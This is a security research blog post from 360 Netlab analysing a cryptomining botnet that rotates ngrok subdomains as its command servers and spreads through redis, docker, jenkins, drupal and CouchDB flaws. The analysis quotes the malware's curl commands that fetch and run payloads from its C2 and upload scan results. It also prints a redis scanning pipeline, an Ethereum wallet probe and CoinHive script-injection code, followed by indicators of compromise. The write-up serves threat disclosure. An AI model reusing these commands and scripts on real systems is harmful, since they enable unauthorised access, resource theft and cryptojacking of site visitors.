<!DOCTYPE html>
<html lang="en">
<head>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />

    <title>A New Mining Botnet Blends Its C2s into ngrok Service</title>
    <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" type="text/css" href="/assets/built/screen.css?v=db215a41fd" />

    <link rel="shortcut icon" href="/favicon.png" type="image/png" />
    <link rel="canonical" href="https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    <link rel="amphtml" href="https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/amp/" />
    
    <meta property="og:site_name" content="360 Netlab Blog - Network Security Research Lab at 360" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="A New Mining Botnet Blends Its C2s into ngrok Service" />
    <meta property="og:description" content="Overview
These days, it feels like new mining malwares are popping up almost daily and we
have pretty much stopped blogging the regular ones so we don’t flood our
readers’ feed.

With that being said, one did have our attention recently. This botnet hides its
C2s(Downloader and Reporter server) by using the ngrok reverse proxy service to
periodically generate large number of random subdomain names. Botnet master does
not have control over what the subdomains will be, as the subdomains
({subdomai" />
    <meta property="og:url" content="https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/" />
    <meta property="article:published_time" content="2018-09-12T15:06:10.000Z" />
    <meta property="article:modified_time" content="2018-10-06T09:13:42.000Z" />
    <meta property="article:tag" content="XMR CryptoCurrency" />
    <meta property="article:tag" content="English" />
    
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:title" content="A New Mining Botnet Blends Its C2s into ngrok Service" />
    <meta name="twitter:description" content="Overview
These days, it feels like new mining malwares are popping up almost daily and we
have pretty much stopped blogging the regular ones so we don’t flood our
readers’ feed.

With that being said, one did have our attention recently. This botnet hides its
C2s(Downloader and Reporter server) by using the ngrok reverse proxy service to
periodically generate large number of random subdomain names. Botnet master does
not have control over what the subdomains will be, as the subdomains
({subdomai" />
    <meta name="twitter:url" content="https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Hui Wang" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="XMR CryptoCurrency, English" />
    <meta name="twitter:site" content="@360Netlab" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "360 Netlab Blog - Network Security Research Lab at 360",
        "logo": "https://blog.netlab.360.com/content/images/2019/02/netlab-brand-5.png"
    },
    "author": {
        "@type": "Person",
        "name": "Hui Wang",
        "image": {
            "@type": "ImageObject",
            "url": "https://blog.netlab.360.com/content/images/2017/05/WechatIMG1.jpeg",
            "width": 1280,
            "height": 1280
        },
        "url": "https://blog.netlab.360.com/author/huiwang/",
        "sameAs": []
    },
    "headline": "A New Mining Botnet Blends Its C2s into ngrok Service",
    "url": "https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/",
    "datePublished": "2018-09-12T15:06:10.000Z",
    "dateModified": "2018-10-06T09:13:42.000Z",
    "keywords": "XMR CryptoCurrency, English",
    "description": "Overview\nThese days, it feels like new mining malwares are popping up almost daily and we\nhave pretty much stopped blogging the regular ones so we don’t flood our\nreaders’ feed.\n\nWith that being said, one did have our attention recently. This botnet hides its\nC2s(Downloader and Reporter server) by using the ngrok reverse proxy service to\nperiodically generate large number of random subdomain names. Botnet master does\nnot have control over what the subdomains will be, as the subdomains\n({subdomai",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://blog.netlab.360.com/"
    }
}
    </script>

    <script src="/public/ghost-sdk.min.js?v=db215a41fd"></script>
<script>
ghost.init({
	clientId: "ghost-frontend",
	clientSecret: "2a7213b591a9"
});
</script>
    <meta name="generator" content="Ghost 2.13" />
    <link rel="alternate" type="application/rss+xml" title="360 Netlab Blog - Network Security Research Lab at 360" href="https://blog.netlab.360.com/rss/" />
    
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-83587830-1', 'auto');
  ga('send', 'pageview');

</script>

<!-- Fix first paragraph font size -->
<style type="text/css">
 .post-template .post-content > p:first-child {font-size: 1em;}
</style>

</head>
<body class="post-template tag-xmr-cryptocurrency tag-english">

    <div class="site-wrapper">

             <header
    class="site-header outer">
    <div class="inner">
        <nav class="site-nav">
    <div class="site-nav-left">
                <a class="site-nav-logo" href="https://blog.netlab.360.com"><img src="https://blog.netlab.360.com/content/images/2019/02/netlab-brand-5.png" alt="360 Netlab Blog - Network Security Research Lab at 360" /></a>
            <ul class="nav" role="menu">
    <li class="nav-botnet" role="menuitem"><a href="https://blog.netlab.360.com/tag/botnet/">Botnet</a></li>
    <li class="nav-dnsmon" role="menuitem"><a href="https://blog.netlab.360.com/tag/dnsmon/">DNSMon</a></li>
    <li class="nav-ddos" role="menuitem"><a href="https://blog.netlab.360.com/tag/ddos/">DDoS</a></li>
    <li class="nav-passivedns" role="menuitem"><a href="https://blog.netlab.360.com/tag/pdns/">PassiveDNS</a></li>
    <li class="nav-marai" role="menuitem"><a href="https://blog.netlab.360.com/tag/mirai/">Marai</a></li>
    <li class="nav-dta" role="menuitem"><a href="https://blog.netlab.360.com/tag/dta/">DTA</a></li>
</ul>

    </div>
    <div class="site-nav-right">
        <div class="social-links">
                <a class="social-link social-link-tw" href="https://twitter.com/360Netlab" title="Twitter" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M30.063 7.313c-.813 1.125-1.75 2.125-2.875 2.938v.75c0 1.563-.188 3.125-.688 4.625a15.088 15.088 0 0 1-2.063 4.438c-.875 1.438-2 2.688-3.25 3.813a15.015 15.015 0 0 1-4.625 2.563c-1.813.688-3.75 1-5.75 1-3.25 0-6.188-.875-8.875-2.625.438.063.875.125 1.375.125 2.688 0 5.063-.875 7.188-2.5-1.25 0-2.375-.375-3.375-1.125s-1.688-1.688-2.063-2.875c.438.063.813.125 1.125.125.5 0 1-.063 1.5-.25-1.313-.25-2.438-.938-3.313-1.938a5.673 5.673 0 0 1-1.313-3.688v-.063c.813.438 1.688.688 2.625.688a5.228 5.228 0 0 1-1.875-2c-.5-.875-.688-1.813-.688-2.75 0-1.063.25-2.063.75-2.938 1.438 1.75 3.188 3.188 5.25 4.25s4.313 1.688 6.688 1.813a5.579 5.579 0 0 1 1.5-5.438c1.125-1.125 2.5-1.688 4.125-1.688s3.063.625 4.188 1.813a11.48 11.48 0 0 0 3.688-1.375c-.438 1.375-1.313 2.438-2.563 3.188 1.125-.125 2.188-.438 3.313-.875z"/></svg>
</a>
        </div>
            <a class="rss-button" href="https://feedly.com/i/subscription/feed/https://blog.netlab.360.com/rss/" title="RSS" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><circle cx="6.18" cy="17.82" r="2.18"/><path d="M4 4.44v2.83c7.03 0 12.73 5.7 12.73 12.73h2.83c0-8.59-6.97-15.56-15.56-15.56zm0 5.66v2.83c3.9 0 7.07 3.17 7.07 7.07h2.83c0-5.47-4.43-9.9-9.9-9.9z"/></svg>
</a>
    </div>
</nav>
    </div>
    </header>


    <main id="site-main" class="site-main outer">
        <div class="inner">

            <article class="post-full post tag-xmr-cryptocurrency tag-english no-image">

                <header class="post-full-header">
                    <section class="post-full-meta">
                        <time class="post-full-meta-date" datetime="2018-09-12">12 September                            2018</time>
                        <span class="date-divider">/</span> <a href="/tag/xmr-cryptocurrency/">XMR CryptoCurrency</a>
                    </section>
                    <h1 class="post-full-title">A New Mining Botnet Blends Its C2s into ngrok Service</h1>
                </header>


                <section class="post-full-content">
                    <div class="post-content">
                        <h1 id="overview">Overview</h1>
<p>These days, it feels like new mining malwares are popping up almost daily and we have pretty much stopped blogging the regular ones so we don’t flood our readers’ feed.</p>
<p>With that being said, one did have our attention recently. This botnet hides its C2s(Downloader and Reporter server) by using the ngrok reverse proxy service to periodically generate large number of random subdomain names. Botnet master does not have control over what the subdomains will be, as the subdomains ({subdomain}.ngrok.io) are generated randomly by ngrok service, which in this case is actually a bless for the botnet. Because there is no good way for the security defender to tell which ones are good and which ones are bad by just looking at the dns names. All have same pattern and all are mixed in the big naming pool.</p>
<p>The main features of this malicious sample are:</p>
<ul>
<li>Use the ngrok reverse proxy service to periodically and randomly switch Downloader and Reporter domain names.</li>
<li>Use many vulnerabilities (redis, docker, jenkins, drupal, modx, CouchDB) to propagate.</li>
<li>A module to scan the Ethereum client to steal the Ethereum, currently is not enabled.</li>
<li>A module to infect the JavaScript files with CoinHive mining script on the target devices to mine in the web browsers.</li>
<li>Mining scripts and scan scripts are under constant update.</li>
<li>The sample consists of four modules: <strong>Scanner, Reporter, Loader and Miner</strong>. The <strong>Scanner</strong> is responsible for scanning and reporting vulnerability information to the <strong>Reporter</strong>. The <strong>Loader</strong> is responsible for implanting Scanner and Miner to the vulnerable devices. And the <strong>Miner</strong> is for mining.</li>
</ul>
<h1 id="ngrok">Ngrok</h1>
<p><a href="https://ngrok.com/">Ngrok</a> is a reverse proxy service. Its core concept is to forward the public network requests to the designated port in the intranet as a forwarding server, so that intranet resources can be accessed from the public network. Its working principle is as follows:</p>
<p><img src="https://blog.netlab.360.com/content/images/2018/09/Snip20180907_12.png" alt=""></p>
<center>*[Figure 1: How ngrok works](https://github.com/inconshreveable/ngrok)*</center>
<p>Ngrok user first goes to ngrok.io to register a service. Then starts ngrok client locally. Ngrok client will get the ngrok subdomains randomly assigned by the server. With these subdomains, resources in the intranet become accessible from the outside network. In the free tier, the ngrok client can have one process, which has four tunnels. Each tunnel gets a subdomain. And every time the client is restarted, the subdomain corresponding to all tunnels will be regenerated.</p>
<h1 id="thec2domains">The C2 domains</h1>
<p>This miner campaign and its domain switching activity started from June this year. The C2 domain names are replaced in group periodically and each group's lifetime is less than 12 hours. In order for readers to get a better idea, we drew the following diagram, at Y-axis are the C2 <strong>Downloader</strong> domains, and each bar on the diagram demonstrates a successful download initiated by our honeypot from the corresponding domain (aka the domain is active). You can easily tell that each group of domains are only active for couple of hours then go offline and get replaced by a bunch of new domains.</p>
<p><img src="https://blog.netlab.360.com/content/images/2018/09/heatmap.png" alt=""></p>
<center>*Figure 2: C2 domains life cycle (open to view large picture)*</center>
<h1 id="scanner">Scanner</h1>
<p>The <strong>Scanner</strong> is implanted by the <strong>Loader</strong>. The scanning target IP range, the Reporter and Downloader domains are hard-coded in the Scanner's script. The execution details are:</p>
<ul>
<li>Download tools including zmap, jq and zgrap from compromised ngrok subdomains.</li>
</ul>
<pre><code>curl -m 120 -fks -o /usr/bin/zmap &quot;hxxp://3a3c559e.ngrok.io/d8/zmap&quot;
curl -m 120 -fks -o /usr/bin/jq &quot;hxxp://53349e8c.ngrok.io/d8/jq&quot;
curl -m 120 -fks -o /usr/bin/zgrab &quot;hxxp://e5a22d36.ngrok.io/d8/zgrab&quot;
</code></pre>
<ul>
<li>Download ethereum client geth scanning payload.</li>
</ul>
<pre><code>#curl -m 120 -fks -o /tmp/.p8545 &quot;hxxp://cc8ef76b.ngrok.io/d8/p8545&quot;
POST / HTTP/1.1
Host: %s:8545
User-Agent: geth
Accept: */*
Content-Type: application/json
Content-Length: 60

{&quot;jsonrpc&quot;:&quot;2.0&quot;,&quot;method&quot;:&quot;eth_accounts&quot;,&quot;params&quot;:[],&quot;id&quot;:1}
</code></pre>
<ul>
<li>Vulnerability scanning: first it uses zmap to scan active ports, and then uses zgrap for application lookup. Currently the malware is targeting ports 6379/2375/80/8080/5984 and redis/docker/jenkins/drupal/modx/couchdb services.</li>
</ul>
<pre><code>  #Scan redis port 6379
  PORT=&quot;6379&quot;
  echo -ne &quot;info\r\nquit\r\n&quot; &gt;/tmp/rinfoa379f8ca
  echo &quot;;;${PORT}&quot; &gt; $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000 -c5 -o- -p $PORT $IPR 2&gt;&gt;${LOGF} | zgrab --senders 100 --port $PORT --data /tmp/rinfoa379f8ca --output-file=- 2&gt;/dev/null | grep 'redis_version' | jq -r .ip &gt;&gt; ${OUT}
</code></pre>
<ul>
<li>Upload scanning results to Reporter on the compromised ngrok subdomains.</li>
</ul>
<pre><code>curl -m 120 -sk -F result=@${_FILE} &quot;hxxp://cc8ef76b.ngrok.io/z?r={RIP}&amp;i={i}&amp;x=${excode}&quot;
</code></pre>
<ul>
<li>Remove trails and exit.</li>
</ul>
<h1 id="miner">Miner</h1>
<p>Just like the Scanner, the <strong>Miner</strong> is also implanted by the <strong>Loader</strong> and its Reporter and Downloader domains are also hard-coded in Miner script.</p>
<pre><code>export HOST=&quot;hxxp://608f5b6c.ngrok.io&quot;
</code></pre>
<p>Its execution process is:</p>
<ul>
<li>Download and run fc, which is a global flag to identify infection status. If it runs successfully, the infection is done. Otherwise, the infection fails and it will upload the error logs to the Reporter.</li>
</ul>
<pre><code>curl -fks -o $INSTALL/93b689 &quot;$HOST/d8/fc&quot;
$INSTALL/93b689 '///' &gt;&gt;201e3a252c5e 2&gt;&amp;1 &amp;
$INSTALL/93b689 '[^$I$^]' &gt;&gt;201e3a252c5e 2&gt;&amp;1 &amp;
</code></pre>
<ul>
<li>Shutdown competitors.</li>
<li>Upload its old version miner's profile to the Reporter, including process name, miner MD5 and miner file path.</li>
<li>Shutdown old version miner.</li>
<li>Download and run daemon (a process management tools) and nginx (the actually <strong>Miner</strong>).</li>
</ul>
<pre><code>curl -fks -o &quot;${RIP}d&quot; &quot;$HOST/d8/daemon&quot;
curl -fks -o dda4512010 &quot;$HOST/d8/nginx&quot;
cat dda4512010 |&quot;${RIP}d&quot;
</code></pre>
<ul>
<li>Check whether /etc/hosts includes any other miner domains, and if it does, overwrite /etc/hosts with &quot;127.0.0.1 localhost&quot; to remove their resolutions.</li>
<li>Remove all other crontab jobs.</li>
<li>Inject CoinHive mining script with a site_key <strong>U1EhkTAx8j1IVGH6KkzoHDuwPy42c7vW</strong> into all JavaScript files in current directory. It looks like a bug as the current directory is its own working directory, which does not contain any JavaScript files.</li>
</ul>
<pre><code>var js=document.createElement(&quot;script&quot;);
js.type=&quot;text/javascript&quot;;
js.src=&quot;hxxps://coinhive.com/lib/coinhive.min.js&quot;,
document.body.appendChild(js),
window.msci=setInterval(
	function(){
		var e=&quot;CoinHive&quot;;
		if(window[e]){
			clearInterval(window.msci);
			var n=window[e].Anonymous;
			window.__m1||(window.__m1=new n(&quot;U1EhkTAx8j1IVGH6KkzoHDuwPy42c7vW&quot;))&amp;&amp;__m1.start()
		}
	},
	200
);
</code></pre>
<ul>
<li>Report miner execution status:</li>
<li>if successful, report miner process ID, the infected device IP ID, the number of CPUs, infection vulnerability and current username.</li>
<li>if failed, report error info including infection result, old version miner profile (process name, miner MD5 and file path), crontab error log, etc.</li>
</ul>
<p>The miner configuration is as follows and its current total paid is 69.676550440000 XMR.</p>
<pre><code>mining pool: pool.minexmr.com:55555
wallet address: 4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW 
</code></pre>
<h1 id="ioc">IoC</h1>
<p>This botnet is under constant change, so we can only provide some very recent indicates.</p>
<h2 id="somerecentmd5s">Some recent md5s</h2>
<pre><code>md5=19e8679be6cfc56a529cf35df2dbece8	uri=hxxp://608f5b6c.ngrok.io/d8/daemon
md5=e309354fe7047a5fca3c774a427ae7a2	uri=hxxp://608f5b6c.ngrok.io/d8/fc
md5=39fcbe99c2d72006667be9bcc286db4e	uri=hxxp://608f5b6c.ngrok.io/d8/nginx
md5=510802ce144bb729c3c527d465321168	uri=hxxp://ce0a62ad.ngrok.io/f/serve?l=u&amp;r={RIP}&amp;curl=1
md5=072922760ec200ccce83ac5ce20c46ca	uri=hxxp://69c0c72e.ngrok.io/z?r={RIP}&amp;i=2a6da41fcf36d873dde9ed0040fcf99ba59f579c3723bb178ba8a2195a11fb61cb6b669ed0f32fb9bdc891e64613e0caad46642f7a9b68ccea30244b4d0addf6d506be7e2c71c3c3793762e8e2a40117f62f0688cfad660a6f9529d3e17e183d769864ea45294d9dca4712ee73d5733
</code></pre>
<h2 id="somerecentactiveloaderips">Some recent active Loader IPs</h2>
<pre><code>194.99.105.76	ASAS9009	M247_Ltd
185.183.104.139	AS9009	M247_Ltd
185.242.6.4	AS9009	M247_Ltd
46.166.142.220	AS43350	NForce_Entertainment_B.V.
217.23.3.91	AS49981	WorldStream_B.V.
89.39.107.195	AS49981	WorldStream_B.V.
185.159.157.19	AS59898	AllSafe_Sarl
194.99.105.75	ASAS9009	M247_Ltd
109.201.133.24	AS43350	NForce_Entertainment_B.V.
217.23.3.92	AS49981	WorldStream_B.V.
46.166.142.215	AS43350	NForce_Entertainment_B.V.
89.39.107.192	AS49981	WorldStream_B.V.
109.201.133.22	AS43350	NForce_Entertainment_B.V.
89.39.107.202	AS49981	WorldStream_B.V.
89.39.107.199	AS49981	WorldStream_B.V.
109.201.133.26	AS43350	NForce_Entertainment_B.V.
</code></pre>

                    </div>
                </section>


                <footer class="post-full-footer">


                    
<section class="author-card">
        <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2017/05/WechatIMG1.jpeg" alt="Hui Wang" />
    <section class="author-card-content">
        <h4 class="author-card-name"><a href="/author/huiwang/">Hui Wang</a></h4>
            <p>Read <a href="/author/huiwang/">more posts</a> by this author.</p>
    </section>
</section>
<div class="post-full-footer-right">
    <a class="author-card-button" href="/author/huiwang/">Read More</a>
</div>


                </footer>

                <div id="disqus_thread"></div>
                <script>
                    var disqus_config = function () {
                        this.page.url = "https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/";
                        this.page.identifier = "ghost-146"
                    };
                    (function () {
                        var d = document, s = d.createElement('script');
                        s.src = 'https://blog-netlab-360.disqus.com/embed.js';
                        s.setAttribute('data-timestamp', +new Date());
                        (d.head || d.body).appendChild(s);
                    })();
                </script>

            </article>

        </div>
    </main>

    <aside class="read-next outer">
        <div class="inner">
            <div class="read-next-feed">
                <article class="read-next-card"   style="background-image: url(https://blog.netlab.360.com/content/images/size/w600/2019/02/astronomy-constellation-dark-998641-4.jpg)"
                     >
                    <header class="read-next-card-header">
                        <small class="read-next-card-header-sitetitle">&mdash; 360 Netlab Blog - Network Security Research Lab at 360 &mdash;</small>
                        <h3 class="read-next-card-header-title"><a href="/tag/xmr-cryptocurrency/">XMR CryptoCurrency</a></h3>
                    </header>
                    <div class="read-next-divider"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 14.5s2 3 5 3 5.5-2.463 5.5-5.5S21 6.5 18 6.5c-5 0-7 11-12 11C2.962 17.5.5 15.037.5 12S3 6.5 6 6.5s4.5 3.5 4.5 3.5"/></svg>
</div>
                    <div class="read-next-card-content">
                        <ul>
                            <li><a href="/miner-delivery-sample-via-ngrok-tunnel/">利用ngrok传播样本挖矿</a></li>
                        </ul>
                    </div>
                    <footer class="read-next-card-footer">
                        <a href="/tag/xmr-cryptocurrency/">1 post →</a>
                    </footer>
                </article>

                <article class="post-card post tag-adbminer tag-fbot tag-dns tag-blockchain tag-satori tag-chinese no-image">


    <div class="post-card-content">

        <a class="post-card-content-link" href="/fbot-a-satori-related-block-chain-dns-based-worm/">

            <header class="post-card-header">
                    <span class="post-card-tags">adbminer</span>
                <h2 class="post-card-title">Fbot，一个Satori相关的、基于区块链DNS的蠕虫</h2>
            </header>

            <section class="post-card-excerpt">
                <p>从2018-09-13 11:30 UTC开始，我们首次注意到一个新的蠕虫正在清理 com.ufo.miner。在完成了清理动作后，该蠕虫会等待来自C2（musl.lib，66.42.57.45:7000， Singapore/SG）的下一步指令。我们将该蠕虫命名为fbot，主要是因为该蠕虫的主要执行模块使用了这个名字。该C2域名的解析，需要通过EmerDNS，一个emercoin.com旗下的区块链DNS完成。 com.ufo.miner 与我们之前多次 报告 的 ADB.</p>
            </section>

        </a>

        <footer class="post-card-meta">

            <ul class="author-list">
                <li class="author-list-item">

                    <div class="author-name-tooltip">
                        Hui Wang
                    </div>

                        <a href="/author/huiwang/" class="static-avatar">
                            <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2017/05/WechatIMG1.jpeg" alt="Hui Wang" />
                        </a>
                </li>
            </ul>

            <span class="reading-time">6 min read</span>

        </footer>

    </div>

</article>

                <article class="post-card post tag-xmr-cryptocurrency tag-chinese no-image">


    <div class="post-card-content">

        <a class="post-card-content-link" href="/miner-delivery-sample-via-ngrok-tunnel/">

            <header class="post-card-header">
                    <span class="post-card-tags">XMR CryptoCurrency</span>
                <h2 class="post-card-title">利用ngrok传播样本挖矿</h2>
            </header>

            <section class="post-card-excerpt">
                <p>概述 &quot;链治百病，药不能停&quot;。时下各种挖矿软件如雨后春笋层出不穷，想把他们都灭了，那是不可能的，这辈子都不可能的。通常我们都忽略他们。但这个利用ngrok生成大量随机域名作为Downloader和Report域名，对抗安全设施阻断其域名，隐藏真实服务器地址的挖矿恶意样本成功的引起了我们的注意。 该恶意样本的主要特点是: 使用ngrok定期更换的随机域名作为Downloader和Report域名。 利用redis，docker，jenkins，drupal，modx，CouchDB漏洞植入xmr挖矿程序挖矿。 企图扫描以太坊客户端，盗取以太币，当前未实际启用。 企图感染目标设备上的js文件，植入CoinHive挖矿脚本浏览器挖矿。 动态生成挖矿脚本和扫描脚本。 该挖矿样本主要模块由Scanner脚本，Miner脚本，Loader构成。Scanner模块负责扫描和上报漏洞信息给Loader。Loader负责给存在漏洞的设备植入Scanner和Miner。Miner负责挖矿。</p>
            </section>

        </a>

        <footer class="post-card-meta">

            <ul class="author-list">
                <li class="author-list-item">

                    <div class="author-name-tooltip">
                        Hui Wang
                    </div>

                        <a href="/author/huiwang/" class="static-avatar">
                            <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2017/05/WechatIMG1.jpeg" alt="Hui Wang" />
                        </a>
                </li>
            </ul>

            <span class="reading-time">6 min read</span>

        </footer>

    </div>

</article>

            </div>
        </div>
    </aside>

    <div class="floating-header">
    <div class="floating-header-logo">
        <a href="https://blog.netlab.360.com">
                <img src="https://blog.netlab.360.com/content/images/size/w30/2019/02/netlab_xs-2.png" alt="360 Netlab Blog - Network Security Research Lab at 360 icon" />
            <span>360 Netlab Blog - Network Security Research Lab at 360</span>
        </a>
    </div>
    <span class="floating-header-divider">&mdash;</span>
    <div class="floating-header-title">A New Mining Botnet Blends Its C2s into ngrok Service</div>
    <div class="floating-header-share">
        <div class="floating-header-share-label">Share this <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
    <path d="M7.5 15.5V4a1.5 1.5 0 1 1 3 0v4.5h2a1 1 0 0 1 1 1h2a1 1 0 0 1 1 1H18a1.5 1.5 0 0 1 1.5 1.5v3.099c0 .929-.13 1.854-.385 2.748L17.5 23.5h-9c-1.5-2-5.417-8.673-5.417-8.673a1.2 1.2 0 0 1 1.76-1.605L7.5 15.5zm6-6v2m-3-3.5v3.5m6-1v2"/>
</svg>
</div>
        <a class="floating-header-share-tw" href="https://twitter.com/share?text=A%20New%20Mining%20Botnet%20Blends%20Its%20C2s%20into%20ngrok%20Service&amp;url=https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/"
            onclick="window.open(this.href, 'share-twitter', 'width=550,height=235');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M30.063 7.313c-.813 1.125-1.75 2.125-2.875 2.938v.75c0 1.563-.188 3.125-.688 4.625a15.088 15.088 0 0 1-2.063 4.438c-.875 1.438-2 2.688-3.25 3.813a15.015 15.015 0 0 1-4.625 2.563c-1.813.688-3.75 1-5.75 1-3.25 0-6.188-.875-8.875-2.625.438.063.875.125 1.375.125 2.688 0 5.063-.875 7.188-2.5-1.25 0-2.375-.375-3.375-1.125s-1.688-1.688-2.063-2.875c.438.063.813.125 1.125.125.5 0 1-.063 1.5-.25-1.313-.25-2.438-.938-3.313-1.938a5.673 5.673 0 0 1-1.313-3.688v-.063c.813.438 1.688.688 2.625.688a5.228 5.228 0 0 1-1.875-2c-.5-.875-.688-1.813-.688-2.75 0-1.063.25-2.063.75-2.938 1.438 1.75 3.188 3.188 5.25 4.25s4.313 1.688 6.688 1.813a5.579 5.579 0 0 1 1.5-5.438c1.125-1.125 2.5-1.688 4.125-1.688s3.063.625 4.188 1.813a11.48 11.48 0 0 0 3.688-1.375c-.438 1.375-1.313 2.438-2.563 3.188 1.125-.125 2.188-.438 3.313-.875z"/></svg>
        </a>
        <a class="floating-header-share-fb" href="https://www.facebook.com/sharer/sharer.php?u=https://blog.netlab.360.com/a-new-mining-botnet-blends-its-c2s-into-ngrok-service/"
            onclick="window.open(this.href, 'share-facebook','width=580,height=296');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M19 6h5V0h-5c-3.86 0-7 3.14-7 7v3H8v6h4v16h6V16h5l1-6h-6V7c0-.542.458-1 1-1z"/></svg>
        </a>
    </div>
    <progress id="reading-progress" class="progress" value="0">
        <div class="progress-container">
            <span class="progress-bar"></span>
        </div>
    </progress>
</div>




        <footer class="site-footer outer">
            <div class="site-footer-content inner">
                <section class="copyright"><a href="https://blog.netlab.360.com">360 Netlab Blog - Network Security Research Lab at 360</a> &copy; 2021</section>
                <nav class="site-footer-nav">
                    <a href="https://blog.netlab.360.com">Latest Posts</a>
                    
                    <a href="https://twitter.com/360Netlab" target="_blank" rel="noopener">Twitter</a>
                    <a href="https://ghost.org" target="_blank" rel="noopener">Ghost</a>
                </nav>
            </div>
        </footer>

    </div>


    <script>
        var images = document.querySelectorAll('.kg-gallery-image img');
        images.forEach(function (image) {
            var container = image.closest('.kg-gallery-image');
            var width = image.attributes.width.value;
            var height = image.attributes.height.value;
            var ratio = width / height;
            container.style.flex = ratio + ' 1 0%';
        })
    </script>


    <script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous">
    </script>
    <script type="text/javascript" src="/assets/built/jquery.fitvids.js?v=db215a41fd"></script>


        <script>

        // NOTE: Scroll performance is poor in Safari
        // - this appears to be due to the events firing much more slowly in Safari.
        //   Dropping the scroll event and using only a raf loop results in smoother
        //   scrolling but continuous processing even when not scrolling
        $(document).ready(function () {
            // Start fitVids
            var $postContent = $(".post-full-content");
            $postContent.fitVids();
            // End fitVids

            var progressBar = document.querySelector('#reading-progress');
            var header = document.querySelector('.floating-header');
            var title = document.querySelector('.post-full-title');

            var lastScrollY = window.scrollY;
            var lastWindowHeight = window.innerHeight;
            var lastDocumentHeight = $(document).height();
            var ticking = false;

            function onScroll() {
                lastScrollY = window.scrollY;
                requestTick();
            }

            function onResize() {
                lastWindowHeight = window.innerHeight;
                lastDocumentHeight = $(document).height();
                requestTick();
            }

            function requestTick() {
                if (!ticking) {
                    requestAnimationFrame(update);
                }
                ticking = true;
            }

            function update() {
                var trigger = title.getBoundingClientRect().top + window.scrollY;
                var triggerOffset = title.offsetHeight + 35;
                var progressMax = lastDocumentHeight - lastWindowHeight;

                // show/hide floating header
                if (lastScrollY >= trigger + triggerOffset) {
                    header.classList.add('floating-active');
                } else {
                    header.classList.remove('floating-active');
                }

                progressBar.setAttribute('max', progressMax);
                progressBar.setAttribute('value', lastScrollY);

                ticking = false;
            }

            window.addEventListener('scroll', onScroll, { passive: true });
            window.addEventListener('resize', onResize, false);

            update();

        });
    </script>


    

</body>
</html>
